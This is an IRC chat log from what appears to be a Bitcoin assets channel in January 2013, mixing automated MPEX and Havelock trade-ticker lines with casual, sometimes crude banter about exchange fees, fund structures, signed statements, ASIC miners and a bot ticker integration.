50% over what's common. Jan 08 17:14:03 SAC took 3/50 Jan 08 17:14:05 if he's nobody it's insanity Jan 08 17:14:09 dude SAC. is this sac ? Jan 08 17:14:11 [MPEX] [S.DICE] 700 @ 0.00465113 = 3.2558 BTC [-] Jan 08 17:14:13 lol Jan 08 17:14:16 well ? Jan 08 17:14:20 2&20 is standard Jan 08 17:14:38 you know, brad pitt made a lot of money Jan 08 17:14:45 therefore i shall be paid when i sing in the shower. Jan 08 17:14:54 Someone should start a fund with the tagline "The SAC of Bitcoin" Jan 08 17:15:00 I bet people would feel happy to pay the 3% deposit fee and think they were getting away with not paying 30 BTC mpex registration Jan 08 17:15:09 Scottish Agricultural College of Bitcoin ? Jan 08 17:15:12 pigeons: is that a joke? Jan 08 17:15:24 pigeons you see what a business enabler i am ? Jan 08 17:15:31 pigeons, actually that is why I take 2 Jan 08 17:15:37 to defray the account fee Jan 08 17:15:38 :) Jan 08 17:16:16 or you could just do it without a setup/deposit fee, like havelock investments :p Jan 08 17:16:23 5% Jan 08 17:16:28 how many here have actually paid the 30btc MPEX reg fee? Jan 08 17:16:34 I paid 20 Jan 08 17:16:36 i got it free Jan 08 17:16:36 hundreds. Jan 08 17:16:44 hundreds - liar Jan 08 17:16:44 [MPEX] [S.DICE] 1941 @ 0.00453282 = 8.7982 BTC [-] Jan 08 17:16:50 dude it's in the monthly reports. Jan 08 17:16:54 If you have >500 BTC to invest, its not a big deal Jan 08 17:16:57 link please Jan 08 17:17:00 ... Jan 08 17:17:12 probably the average MPEX account has >500 Jan 08 17:17:28 i am very doubtful on that _hundreds_ would've paid 30 btc mpex reg fee Jan 08 17:17:31 http://trilema.com/2012/mpoe-bonds-historical-data/ Jan 08 17:17:35 there, all the links in the bottom. Jan 08 17:17:42 I would charge people for this chat, so that the poor people stay out Jan 08 17:17:43 you're very doubtful. why is that exactly ? Jan 08 17:17:56 S.DICE returned 5% this month Jan 08 17:18:03 Dr-X prolly public access to the trade chan is a thing of limited timespan Jan 08 17:18:12 ";;later tell namjies" - but he rebranded himself, will he get it still? Jan 08 17:18:14 ;;calc 30/.05 Jan 08 17:18:14 600 Jan 08 17:18:23 jurov iirc he logs as namjies neh ? Jan 08 17:18:24 o wait, stock price is up 40% too Jan 08 17:18:34 ;;calc 30/.45 Jan 08 17:18:34 66.6666666667 Jan 08 17:18:35 sorry but where do i see the actual numbers of registred accounts, mircea_popescu? Jan 08 17:18:53 its reported in the mpex statement as revenue from new accounts. Jan 08 17:20:01 [MPEX] [S.DICE] 549 @ 0.00455133 = 2.4987 BTC [+] Jan 08 17:20:19 again, has havelock ever shown a non-doctored statement yet? Jan 08 17:20:34 ahh Jan 08 17:20:39 pigeons yeah Jan 08 17:20:51 on the third try but they did it. gpg has a curve. Jan 08 17:20:52 nov 12 seems to have had 240 from new accs, making it 8 new accounts, right? Jan 08 17:21:08 anywhere between 8 and 12. Jan 08 17:21:16 there's a referral scheme Jan 08 17:21:25 which works how? Jan 08 17:21:36 give your key id, both get 5 btc Jan 08 17:21:41 new user names referrer by keyid, the both get 5 btc. tis in the faq. Jan 08 17:21:47 'aight Jan 08 17:21:56 someone else mentioned it yesterday Jan 08 17:22:18 it's starting to possibly dawn on people (one year later) that making 5 btc per signup is not at all a bad deal Jan 08 17:22:22 heck, porn doesn't pay that. Jan 08 17:23:08 pigeons: what do you mean? havelock non doctored statement?? Jan 08 17:23:27 topace: i mean that havelock cut out the gpg signature Jan 08 17:23:39 i'll give you one right now Jan 08 17:23:40 so we can't verify its authenticity Jan 08 17:24:58 nah they published a proper one eventually. Jan 08 17:25:13 ok. Jan 08 17:25:21 http://www.lightbox.ca/~james/stat.for.pigeons.txt Jan 08 17:26:00 pigeons: please verify Jan 08 17:26:17 gpg: Signature made Tue 08 Jan 2013 10:24:48 AM EST using DSA key ID F1B69921 Jan 08 17:26:20 gpg: Good signature from "MP Stock Exchange (Visit http://polimedia.us/bitcoin/) " Jan 08 17:26:21 [MPEX] [S.MPOE] 10200 @ 0.00063566 = 6.4837 BTC [-] Jan 08 17:26:22 [MPEX] [S.MPOE] 1702 @ 0.00064571 = 1.099 BTC [+] Jan 08 17:26:24 thanks Jan 08 17:26:24 [MPEX] [S.MPOE] 8076 @ 0.00064708 = 5.2258 BTC [+] Jan 08 17:26:32 lol and now you know my s.bbet bid :p Jan 08 17:26:40 :) Jan 08 17:27:11 public offering that started this morning is half sold out too Jan 08 17:27:21 will bring us to 250,000 shares Jan 08 17:27:28 pretty good response Jan 08 17:29:36 nice to hear from you topace i didnt know havelock was here Jan 08 17:32:08 he quit on you. Jan 08 17:32:52 [MPEX] [S.MPOE] 20200 @ 0.00064886 = 13.107 BTC [+] Jan 08 17:32:57 i have that effect Jan 08 17:33:12 lol Jan 08 17:36:20 mircea_popescu, care to look on withdrawals? Jan 08 17:37:08 [MPEX] [S.MPOE] 15400 @ 0.00065195 = 10.04 BTC [+] Jan 08 17:37:56 oops sorry pigeons saw nothing after "pretty good response" Jan 08 17:38:00 yea, im surprised at the response Jan 08 17:38:10 but ill keep buying shares and issuing units on havelock if the demand is there Jan 08 17:40:04 16:27.24 ( pigeons ) pretty good response Jan 08 17:40:05 16:29.32 ( pigeons ) nice to hear from you topace i didnt know havelock was here Jan 08 17:40:05 16:31.51 .•• topace ( ~kvirc@unaffiliated/topace ) has quit IRC ( Ping timeout: 246 seconds ) Jan 08 17:40:05 16:32.04 ( kakobrekla ) he quit on you. Jan 08 17:40:05 16:32.49 ( @assbot ) [MPEX] [S.MPOE] 20200 @ 0.00064886 = 13.107 BTC [+] Jan 08 17:40:05 16:32.53 ( pigeons ) i have that effect Jan 08 17:40:30 haha Jan 08 17:40:51 aparently my office connection sucks today Jan 08 17:41:35 kakobrekla: mircea_popescu said there might be a possibility to interface with assbot for traders on havelock? Jan 08 17:41:50 pm me and we talk. Jan 08 17:44:08 [MPEX] [S.DICE] 1650 @ 0.00467745 = 7.7178 BTC [+] Jan 08 17:44:09 [MPEX] [S.DICE] 700 @ 0.00458277 = 3.2079 BTC [-] Jan 08 17:46:25 I bet people would feel happy to pay the 3% deposit fee and think they were getting away with not paying 30 BTC mpex registration Jan 08 17:46:31 ^ what makes you so sure? Jan 08 17:48:48 [MPEX] [S.MPOE] 4600 @ 0.00065195 = 2.999 BTC [+] Jan 08 17:48:50 [MPEX] [S.MPOE] 7850 @ 0.00065196 = 5.1179 BTC [+] Jan 08 17:51:55 oh, disregard that. even 1BTC/year for coinbr is too much to these. with burnside placed himself on prominent place. Jan 08 17:53:09 and you next to him, ofc Jan 08 17:57:16 q Jan 08 17:59:40 what's unclear? there just seems to be a group of people unable to stomach mpex Jan 08 18:00:40 [MPEX] [S.DICE] 36 @ 0.00468254 = 0.1686 BTC [+] Jan 08 18:00:42 [MPEX] [S.DICE] 378 @ 0.00473719 = 1.7907 BTC [+] Jan 08 18:00:43 [MPEX] [S.DICE] 86 @ 0.00474063 = 0.4077 BTC [+] Jan 08 18:02:00 like EskimoBob Jan 08 18:02:04 lol Jan 08 18:07:32 [MPEX] [S.DICE] 949 @ 0.00470184 = 4.462 BTC [-] Jan 08 18:08:19 EskimoBob: you're more than welcome to use havelock investments :p Jan 08 18:11:21 topace, don't dare to ask any fees, then :) Jan 08 18:11:45 we dont Jan 08 18:12:09 for s.dice passthru its just a % of the dividends (5%) Jan 08 18:12:23 but no deposit/withdraw fees, no trade fees, no setup fees Jan 08 18:13:02 [MPEX] [S.MPOE] 4700 @ 0.00064886 = 3.0496 BTC [-] Jan 08 18:21:30 [MPEX] [S.DICE] 2000 @ 0.00474063 = 9.4813 BTC [+] Jan 08 18:26:51 [MPEX] [S.MPOE] 5849 @ 0.00065196 = 3.8133 BTC [+] Jan 08 18:26:52 [MPEX] [S.MPOE] 4401 @ 0.00065419 = 2.8791 BTC [+] Jan 08 18:30:22 gypsy bazaar Jan 08 18:30:33 never heard mpex called that before Jan 08 18:30:43 EskimoBob you are quite creative Jan 08 18:31:21 I like that phrase Jan 08 18:31:30 I agree with EskimoBob though Jan 08 18:31:33 Ha, indeed..gave me some interesting visuals Jan 08 18:31:39 mpex has two worthwhile stocks, mpex being one of them Jan 08 18:32:43 i love that EskimoBob follows up "sucking up as hard as you can" with a smiley face Jan 08 18:33:18 gives me warm fuzzies to know that EskimoBob's creativeness is not reserved just for the gigamining thread Jan 08 18:33:20 love is in the air. Jan 08 18:34:30 they aren't gypsies, you missed in class when mircea explained teh pic Jan 08 18:34:39 :DD Jan 08 18:35:20 lol Jan 08 18:35:26 you can call if you like Jan 08 18:36:08 iirc, they were smuggling his luggage from or to guatemala Jan 08 18:38:54 EskimoBob: is a hater Jan 08 18:39:45 jurov im sorry but mpex doesn't process withdrawals Jan 08 18:39:47 deposits only. Jan 08 18:39:53 :D Jan 08 18:39:54 EskimoBob what do you mean "handle the forums" Jan 08 18:40:00 oh, no more withdrawals? Jan 08 18:40:36 EskimoBob - you see what happens when you complain about withdrawal fee. Jan 08 18:40:45 who's da gypsy ? Jan 08 18:40:49 they'll get discontinued Jan 08 18:41:22 well, if i was only selling bull shit, i'm sure it would be a lot harder Jan 08 18:41:44 but there isn't much to telling the truth Jan 08 18:43:07 [MPEX] [S.DICE] 167 @ 0.00474063 = 0.7917 BTC [+] Jan 08 18:43:08 [MPEX] [S.DICE] 1000 @ 0.00474806 = 4.7481 BTC [+] Jan 08 18:43:09 [MPEX] [S.DICE] 1000 @ 0.00475272 = 4.7527 BTC [+] Jan 08 18:43:10 [MPEX] [S.DICE] 833 @ 0.00475481 = 3.9608 BTC [+] Jan 08 18:43:34 Teramining contract is already created Jan 08 18:43:40 jurov it was from chiapas to peten Jan 08 18:43:44 (mexico to guatemala) Jan 08 18:43:45 ready to go Jan 08 18:43:49 speaking of legal, I wish we had a bitlawyer Jan 08 18:44:23 EskimoBob: its not complicated or expensive in the US Jan 08 18:44:34 although it depends which state you're incorporating in Jan 08 18:45:00 yes, a contract Jan 08 18:45:03 establishing a legal entity in the States isn't hard at all Jan 08 18:45:10 that's what I did Jan 08 18:45:18 EskimoBob: yes/no Jan 08 18:45:25 I think we had this discussion before Jan 08 18:46:00 [MPEX] [S.DICE] 1950 @ 0.00472926 = 9.2221 BTC [-] Jan 08 18:48:01 [MPEX] [S.DICE] 2475 @ 0.00475481 = 11.7682 BTC [+] Jan 08 18:48:02 [MPEX] [S.DICE] 11400 @ 0.00475485 = 54.2053 BTC [+] Jan 08 18:48:03 [MPEX] [S.DICE] 2550 @ 0.00477418 = 12.1742 BTC [+] Jan 08 18:48:05 [MPEX] [S.DICE] 50000 @ 0.0047797 = 238.985 BTC [+] Jan 08 18:48:06 [MPEX] [S.DICE] 2500 @ 0.00478065 = 11.9516 BTC [+] Jan 08 18:48:06 EskimoBob: it depends on the state Jan 08 18:48:07 [MPEX] [S.DICE] 77075 @ 0.00478699 = 368.9573 BTC [+] Jan 08 18:48:31 EskimoBob: like, some states do not require the state to have a list of all investors, or even the company to have to make it public on request Jan 08 18:48:42 I think its nevada that has that, but I could be wrong Jan 08 18:49:06 Ukto: talk to nanotube to get your shit on assbot Jan 08 18:49:12 [MPEX] [S.DICE] 181 @ 0.00472926 = 0.856 BTC [-] Jan 08 18:49:41 EskimoBob: it can be in some cases, yes Jan 08 18:52:23 contracts are important though Jan 08 18:52:56 still is...that's called a verbal contract Jan 08 18:53:09 yes, but verbal contracts are hard to enforce Jan 08 18:54:03 unless you have a witness haha, but yeah for the most part they're a pain Jan 08 18:54:16 well yes Jan 08 18:54:20 if he was truly a gentleman Jan 08 18:54:22 this wouldnt be a problem Jan 08 18:54:30 indeed Jan 08 18:54:38 yup Jan 08 18:54:43 there are very very very very few people I trust Jan 08 18:54:59 and the very few I trust usually end up stabbing me in the back anyhow Jan 08 18:55:06 so yes, the days of gentlemen are over. Jan 08 18:56:57 O_o Jan 08 18:57:11 Ha, seems that way sometimes Jan 08 19:01:18 [MPEX] [S.DICE] 5000 @ 0.00468872 = 23.4436 BTC [-] Jan 08 19:02:00 [MPEX] [S.DICE] 3600 @ 0.00468872 = 16.8794 BTC [-] Jan 08 19:11:56 EskimoBob: ICBIT was told how to set up assbot ticker but it never went anywhere Jan 08 19:12:01 don't blame assbot :P Jan 08 19:12:12 [MPEX] [S.DICE] 2415 @ 0.00472477 = 11.4103 BTC [+] Jan 08 19:13:06 Soon S.DICE will be prie for shorting Jan 08 19:13:33 [MPEX] [S.DICE] 5580 @ 0.00478699 = 26.7114 BTC [+] Jan 08 19:14:46 mh Jan 08 19:15:08 no profits this month so far Jan 08 19:15:44 impatient much Jan 08 19:15:49 someone who wants to get exit the position and take his profits elsewhere will sell soon Jan 08 19:16:00 and we'll see a wall of sells Jan 08 19:16:17 but in small lucky bursts Jan 08 19:16:21 you have to keep yo eye out Jan 08 19:16:57 the ipo was for 0.0037? Jan 08 19:16:57 [MPEX] [S.DICE] 2800 @ 0.00478699 = 13.4036 BTC [+] Jan 08 19:17:26 wow we're up to that 125k ask wlal Jan 08 19:17:28 wall Jan 08 19:17:36 [MPEX] [S.MPOE] 17502 @ 0.00064886 = 11.3563 BTC [-] Jan 08 19:17:59 really Jan 08 19:18:13 no volume Jan 08 19:18:16 just a wall Jan 08 19:18:26 125k ? Jan 08 19:20:23 no like a wall of text Jan 08 19:20:28 cause it happens so fast Jan 08 19:20:36 but no not a ot of volume Jan 08 19:20:46 like under 25 btc at first Jan 08 19:20:52 small fish exiting Jan 08 19:20:58 [MPEX] [S.DICE] 1450 @ 0.00478108 = 6.9326 BTC [-] Jan 08 19:21:23 http://news.ycombinator.com/item?id=5026802 Jan 08 19:22:15 I didn't know there were free ACH services.. Jan 08 19:22:34 [MPEX] [S.DICE] 1670 @ 0.00478698 = 7.9943 BTC [+] Jan 08 19:22:36 [MPEX] [S.DICE] 530 @ 0.00478699 = 2.5371 BTC [+] Jan 08 19:22:37 oh it's not free lame Jan 08 19:23:26 jcpham: what is this nonsense Jan 08 19:25:02 i'm not sure Jan 08 19:25:14 but bank acount details in curl commands must be legit Jan 08 19:26:23 [MPEX] [S.DICE] 1385 @ 0.00478107 = 6.6218 BTC [-] Jan 08 19:27:22 what do you expect from ycombinator Jan 08 19:28:06 are you on drugs thestringpuller? Jan 08 19:28:45 y combinator is a startup incubator Jan 08 19:28:52 hn has nothing to do with it Jan 08 19:30:25 Dr-X 32/34/37 Jan 08 19:31:34 Are you on drugs Diablo-D3 ? "At Balanced Payments YC W2011" Jan 08 19:31:45 The poster was in YC Jan 08 19:32:09 wasn't 2011 like 2 years ago ? Jan 08 19:32:09 ...like airbnb Jan 08 19:32:09 you're implying I clicked the link Jan 08 19:32:11 the jokes on you Jan 08 19:32:30 What joke... Jan 08 19:33:04 https://balancedpayments.com Jan 08 19:33:09 that's the joke :P Jan 08 19:34:36 I still dont get why you're bringing YC up here Jan 08 19:34:42 they were in the YC before the previous one Jan 08 19:35:01 [MPEX] [S.MPOE] 5709 @ 0.00065419 = 3.7348 BTC [+] Jan 08 19:35:03 [MPEX] [S.MPOE] 691 @ 0.00065576 = 0.4531 BTC [+] Jan 08 19:36:30 !ticker s.dice Jan 08 19:36:32 [MPEX:S.DICE] 1day: 0.004312 / 0.00469748 / 0.0047888 (397246 shares, 1,866.06 BTC), 30day: 0.0014 / 0.00337775 / 0.0048 (13703504 shares, 46,287.08 BTC) Jan 08 19:36:36 heh Jan 08 19:36:52 HN is has funny things Jan 08 19:36:56 *has Jan 08 19:36:58 thestringpuller if you're looking at the net cashflow indicator for mpex it's unlikely a sellout is in the works Jan 08 19:37:16 relative: http://www.tit4bit.com/ Jan 08 19:38:01 Beginner's Bondage Fantasy Jan 08 19:38:08 With four wrist and ankle restraints attached to nylon straps, this set is sure to produce a happy ending. Jan 08 19:38:09 fuckwits. Jan 08 19:38:17 no synthetics in bondage omfg. Jan 08 19:38:30 haha Jan 08 19:41:00 lol Jan 08 19:43:34 "but mp, nylon is so much cheaper" Jan 08 19:43:52 [MPEX] [S.DICE] 4200 @ 0.00478107 = 20.0805 BTC [-] Jan 08 19:44:52 mircea_popescu, the expert in bondage, has spoken Jan 08 19:46:18 i prolly did tie more women up than teh average internet dood slept with Jan 08 19:48:13 [MPEX] [S.DICE] 440 @ 0.00478698 = 2.1063 BTC [+] Jan 08 19:48:15 [MPEX] [S.DICE] 11219 @ 0.00478699 = 53.7052 BTC [+] Jan 08 19:58:23 [MPEX] [S.DICE] 3621 @ 0.00478699 = 17.3337 BTC [+] Jan 08 20:03:48 !ticker s.dice Jan 08 20:03:49 [MPEX:S.DICE] 1day: 0.00436997 / 0.00471658 / 0.0047888 (387085 shares, 1,825.72 BTC), 30day: 0.0014 / 0.00337974 / 0.0048 (13712984 shares, 46,346.45 BTC) Jan 08 20:06:42 [MPEX] [S.DICE] 3000 @ 0.00478699 = 14.361 BTC [+] Jan 08 20:09:19 http://nymag.com/news/features/tide-detergent-drugs-2013-1 Jan 08 20:09:29 i love reading about tide detergent theft Jan 08 20:09:40 [MPEX] [S.DICE] 3737 @ 0.00478699 = 17.889 BTC [+] Jan 08 20:10:23 "the voice dictation program on my ipad hears bitbet, writes "big butt"" Jan 08 20:10:25 tru story. Jan 08 20:16:00 [MPEX] [S.DICE] 580 @ 0.00478699 = 2.7765 BTC [+] Jan 08 20:18:09 [MPEX] [S.DICE] 1300 @ 0.00478699 = 6.2231 BTC [+] Jan 08 20:18:54 [MPEX] [S.MPOE] 10000 @ 0.00064921 = 6.4921 BTC [-] Jan 08 20:31:23 [MPEX] [S.DICE] 1850 @ 0.00478107 = 8.845 BTC [-] Jan 08 20:39:51 [MPEX] [S.DICE] 3800 @ 0.00478699 = 18.1906 BTC [+] Jan 08 20:43:09 [MPEX] [S.DICE] 2285 @ 0.00478107 = 10.9247 BTC [-] Jan 08 20:43:11 [MPEX] [S.DICE] 800 @ 0.00469696 = 3.7576 BTC [-] Jan 08 20:43:12 [MPEX] [S.DICE] 794 @ 0.00469615 = 3.7287 BTC [-] Jan 08 20:43:54 [MPEX] [S.DICE] 3650 @ 0.00478699 = 17.4725 BTC [+] Jan 08 20:49:26 [MPEX] [S.DICE] 1275 @ 0.00478699 = 6.1034 BTC [+] Jan 08 20:50:04 ;;ticker Jan 08 20:50:04 BTCUSD ticker | Best bid: 13.81370, Best ask: 13.84499, Bid-ask spread: 0.03129, Last trade: 13.80998, 24 hour volume: 46657.68368336, 24 hour low: 13.45315, 24 hour high: 13.84500, 24 hour vwap: 13.66023 Jan 08 20:50:31 rally time, eh? Jan 08 20:50:40 seems that way Jan 08 20:51:08 ;;seen smickles Jan 08 20:51:09 smickles was last seen in #bitcoin-assets 37 seconds ago: rally time, eh? Jan 08 20:51:42 heh, thestringpuller look 5 lines up Jan 08 20:52:00 or 4, depending on how you count it Jan 08 21:08:14 ;;ticker Jan 08 21:08:15 BTCUSD ticker | Best bid: 13.81371, Best ask: 13.84000, Bid-ask spread: 0.02629, Last trade: 13.81371, 24 hour volume: 46883.13203225, 24 hour low: 13.46000, 24 hour high: 13.85000, 24 hour vwap: 13.66531 Jan 08 21:10:31 [MPEX] [S.MPOE] 16000 @ 0.00064939 = 10.3902 BTC [+] Jan 08 21:10:33 [MPEX] [S.MPOE] 6559 @ 0.00064886 = 4.2559 BTC [-] Jan 08 21:19:58 ;;ticker Jan 08 21:19:59 BTCUSD ticker | Best bid: 13.82370, Best ask: 13.84899, Bid-ask spread: 0.02529, Last trade: 13.82370, 24 hour volume: 46826.34867111, 24 hour low: 13.46000, 24 hour high: 13.87000, 24 hour vwap: 13.66692 Jan 08 21:20:25 6 month high about to go down (13.88) Jan 08 21:21:57 [MPEX] [S.MPOE] 7043 @ 0.00064467 = 4.5404 BTC [-] Jan 08 21:27:13 [MPEX] [S.DICE] 1224 @ 0.00469615 = 5.7481 BTC [-] Jan 08 21:31:02 [MPEX] [S.DICE] 469 @ 0.00478699 = 2.2451 BTC [+] Jan 08 21:31:21 Bugpowder, or not. it's not so dramatic rise Jan 08 21:31:22 [MPEX] [S.DICE] 990 @ 0.00478699 = 4.7391 BTC [+] Jan 08 21:36:20 cay anyone make sense of burnside's intentions? https://bitcointalk.org/index.php?topic=125629.240;topicseen Jan 08 21:36:50 like, he's looking to gradually sell btct.. to whom? the community? Jan 08 21:38:04 John McAfee Jan 08 21:38:11 [MPEX] [S.DICE] 4050 @ 0.00478699 = 19.3873 BTC [+] Jan 08 21:41:39 [MPEX] [S.MPOE] 13250 @ 0.00064237 = 8.5114 BTC [-] Jan 08 21:46:06 [MPEX] [S.DICE] 3902 @ 0.00469616 = 18.3244 BTC [-] Jan 08 21:53:32 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.5417181 = 541.7181 BTC [+] Jan 08 21:53:37 kakobrekla: you there? check pm Jan 08 21:54:39 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.62300558 = 623.0056 BTC [+] Jan 08 21:55:05 [MPEX] [S.DICE] 2108 @ 0.00478699 = 10.091 BTC [+] Jan 08 21:56:35 jurov seems just "mpex rehash, except we can't call it that." Jan 08 21:57:19 duh Bugpowder you been scaring away options ppls Jan 08 21:57:26 [MPEX] [S.DICE] 750 @ 0.00478699 = 3.5902 BTC [+] Jan 08 21:57:34 me? Jan 08 21:57:52 I've been trying to buy and sell them Jan 08 21:58:00 need some variance Jan 08 21:58:16 ppl covering puts Jan 08 21:59:00 13.87998 Jan 08 22:03:40 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.62177589 = 621.7759 BTC [-] Jan 08 22:03:50 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.54057549 = 540.5755 BTC [-] Jan 08 22:04:29 heh Jan 08 22:04:35 MOAR Jan 08 22:13:02 [MPEX] [S.MPOE] 7000 @ 0.00064237 = 4.4966 BTC [-] Jan 08 22:13:03 [MPEX] [S.MPOE] 14300 @ 0.0006365 = 9.102 BTC [-] Jan 08 22:17:39 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.62173733 = 621.7373 BTC [-] Jan 08 22:17:40 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.54053461 = 540.5346 BTC [-] Jan 08 22:18:42 https://bitcointalk.org/index.php?topic=135366.0 Jan 08 22:18:47 kind of interesting Jan 08 22:20:05 isn't BTCGOLD that asset name squatter guy? Jan 08 22:20:34 from glbse Jan 08 22:20:45 may be Jan 08 22:20:50 New peer-to-peer lending on Bitfinex << pigeons! Jan 08 22:21:49 the bitcoinica v-2.0 is back with moar jam! Jan 08 22:22:10 what does the CTG in BCB's tagline mean? Jan 08 22:22:29 bASIC will not ship until mid to end of March Jan 08 22:22:30 ouch Jan 08 22:22:51 so basically cablepair is out of the game. Jan 08 22:24:47 yea Jan 08 22:24:58 glad i only have a few orders with them Jan 08 22:26:38 tbh https://bitcointalk.org/index.php?topic=41592.0;topicseen Jan 08 22:26:45 this is obviously not a german Jan 08 22:27:00 so basically, bfl is in inaba mode, basic is wiped, asicminer claims to have chips Jan 08 22:27:04 end of the asic race ? Jan 08 22:27:10 that is straight chinglish Jan 08 22:27:26 dub tbh i also though the guy is azn Jan 08 22:27:40 when i first saw him, 6 mo ago or w/e Jan 08 22:29:02 also wah happen to kluge's scammer tag Jan 08 22:29:14 [MPEX] [S.MPOE] 1050 @ 0.0006365 = 0.6683 BTC [-] Jan 08 22:29:16 [MPEX] [S.MPOE] 13500 @ 0.00063645 = 8.5921 BTC [-] Jan 08 22:29:55 so, looks like bitmit is closing https://bitcointalk.org/index.php?topic=41592.msg1441934#msg1441934 Jan 08 22:30:00 so uhhh Jan 08 22:30:06 whats the roblum with asicminer Jan 08 22:30:06 ? Jan 08 22:30:07 worst possible way of announcing it Jan 08 22:30:12 do they have some kind of delay incomin? Jan 08 22:30:37 Anduck not afaik. they however have a different model, whereby they don't deliver items Jan 08 22:30:45 so they can claim w/e they want for longer. Jan 08 22:30:51 dub i have no idea. Jan 08 22:31:51 [MPEX] [S.DICE] 3949 @ 0.00478699 = 18.9038 BTC [+] Jan 08 22:32:19 mircea_popescu: but they need to start mining!! Jan 08 22:36:25 not really. Jan 08 22:37:42 I haven't seen Goat in forever. Jan 08 22:38:24 he's dissapeared. Jan 08 22:40:30 [MPEX] [S.DICE] 546 @ 0.00478699 = 2.6137 BTC [+] Jan 08 22:40:56 Are you implying anything? Jan 08 22:41:22 link? Jan 08 22:42:24 its dumb Jan 08 22:42:29 just an irc troll Jan 08 22:43:10 lets see if this works. Jan 08 22:44:05 nope. Jan 08 22:44:06 failure Jan 08 22:44:58 aha. Jan 08 22:45:34 EskimoBob: substanciate that comment or entrench your reputation as a moron Jan 08 22:46:19 [HAVELOCK] [SDICE] 1 @ 0.49 BTC Jan 08 22:46:21 [HAVELOCK] [SDICE] 1 @ 0.49 BTC Jan 08 22:46:24 [HAVELOCK] [SDICE] 1 @ 0.49 BTC Jan 08 22:46:33 whoa! Jan 08 22:46:34 ok we got it we got it. jeez. Jan 08 22:47:22 [HAVELOCK] [SDICE] 1 @ 0.49 BTC Jan 08 22:47:24 topace go for it. Jan 08 22:48:55 why isnt it S.DICE..... Jan 08 22:49:16 talk to topace. Jan 08 22:49:19 :p Jan 08 22:49:43 woohoo Jan 08 22:49:47 thanks kakobrekla Jan 08 22:49:55 welcome Jan 08 22:50:02 Namworld im not implying anything. he just dissapeared Jan 08 22:50:11 o hey! well done havelock Jan 08 22:51:00 [HAVELOCK] [KCIM] 1 @ 1 BTC Jan 08 22:51:02 topace http://trilema.com/2012/mpsics-in-detail/ Jan 08 22:51:02 that was the test one, lets see if a "live" one works Jan 08 22:51:35 excellent Jan 08 22:51:36 so who'd have thunk it, havelock beat everyone to it. Ukto you see that ? Jan 08 22:51:48 hehe Jan 08 22:51:57 that took all of, umm... 7 minutes to implement Jan 08 22:52:00 i know lol Jan 08 22:52:19 It's so alive in here now Jan 08 22:52:24 feels like the good ole days Jan 08 22:52:28 of 3 months ago Jan 08 22:52:32 https://bitcointalk.org/index.php?topic=134733.msg1442258#msg1442258 Jan 08 22:52:36 lol that should stir the pot a little Jan 08 22:52:39 err 4 months ago Jan 08 22:52:48 Bugpowder you were here 4 months ago ?! Jan 08 22:53:19 [MPEX] [S.DICE] 10500 @ 0.00478699 = 50.2634 BTC [+] Jan 08 22:54:18 kakobrekla: can you add the "= x BTC" calculation to the havelock one? same as for MPEX? or do you need me to post that through? Jan 08 22:54:31 (just for consistency) Jan 08 22:54:38 topace it will happen automagically if amount is > 1 Jan 08 22:54:42 ah Jan 08 22:54:43 :) Jan 08 22:54:57 also the [+] and [-] will start to work Jan 08 22:55:02 once the bot gets the data Jan 08 22:55:08 historical Jan 08 22:55:08 awesome Jan 08 22:55:16 yah, around Sept 1st Jan 08 22:55:54 topace, 1 @ 0.49 = 0.49 Jan 08 22:55:57 :) Jan 08 22:56:00 https://bitcointalk.org/index.php?topic=120119.msg1429822#msg1429822 can't tell if retarded Jan 08 22:56:22 wait. you can't tell if someone on btctalk is retarded, that's what you're saying to me ? Jan 08 22:57:59 [MPEX] [S.DICE] 4098 @ 0.00478699 = 19.6171 BTC [+] Jan 08 22:59:00 !ticker KCIM Jan 08 22:59:01 Invalid ticker. Jan 08 22:59:08 not yet implemented Jan 08 22:59:30 i think topace will expand the api first Jan 08 22:59:34 aite. what's kcim anyway ? Jan 08 23:00:16 https://www.havelockinvestments.com/fund.php?symbol=KCIM Jan 08 23:02:33 [MPEX] [S.DICE] 1500 @ 0.00478699 = 7.1805 BTC [+] Jan 08 23:04:39 can i short it ? Jan 08 23:06:39 AA beats Jan 08 23:06:46 gonna be a good earnings season Jan 08 23:08:27 topace do you lend shares ? Jan 08 23:09:18 not at the moment Jan 08 23:09:43 i honestly dont fully undertsand the financials behind shorting, options, etc. Jan 08 23:10:24 how come contract says 10k float says 833 ? Jan 08 23:12:03 ipo units arent in float until they are sold Jan 08 23:12:22 [MPEX] [S.DICE] 863 @ 0.00477086 = 4.1173 BTC [-] Jan 08 23:12:24 [MPEX] [S.DICE] 337 @ 0.00470028 = 1.584 BTC [-] Jan 08 23:12:32 so basically this is a sort of bond. Jan 08 23:12:33 Units of the fund ARE convertible to shares on MPEX at 1 unit = 100 shares PUSHED to your MPEX account for a fixed fee of 10 BTC per transfer (fee subject to change). Contact us by email to initiate a transfer. Jan 08 23:13:03 lolz. so basically, the only way it makes sense to get a push is if you own more shares on havelock than it'd make sense to own. Jan 08 23:13:12 indeed Jan 08 23:13:38 if someone builds up slowly a lot on havelock and realizes they dont want to pay us the 5% of their dividend anymore, they can get us to move the shares to mpex Jan 08 23:13:51 or in case of some emergency Jan 08 23:13:53 if they're paying 30BTC to open a mpex account, they can pay 10btc for us to move their shares over Jan 08 23:14:17 obviously, its to discourage people from constantly moving shares, as that would be annoying as hell :) Jan 08 23:14:21 but its there as an option Jan 08 23:14:25 yeah. Jan 08 23:15:34 now to figure out why my ticker api is giving me nulls Jan 08 23:16:07 [MPEX] [S.MPOE] 15856 @ 0.00064374 = 10.2071 BTC [+] Jan 08 23:16:50 Ok, imagine this: ASIC do ship Jan 08 23:17:01 What then? Jan 08 23:17:09 gpu's will drop out of network Jan 08 23:17:17 (the ones who pay for electricity) Jan 08 23:17:28 Hmm. Cheap year for the used GPUs market. Jan 08 23:18:21 if asics do ship im buying a 2014 calendar Jan 08 23:18:27 cause obviously my 2013 one is out of date. Jan 08 23:18:30 [MPEX] [S.DICE] 1200 @ 0.00470028 = 5.6403 BTC [-] Jan 08 23:18:43 Eheh, fun Jan 08 23:19:30 i wonder if the mvoe away from gpu's will hurt AMD/ATI's bottom line :p Jan 08 23:19:40 doubt it Jan 08 23:19:45 we mostly use discontinued models neh ? Jan 08 23:21:53 Well I think the chips were long sold when miners bought the cards from cards makers. Jan 08 23:22:08 and bought them because they were cheap. Jan 08 23:22:28 5830's or 5850's were the best Jan 08 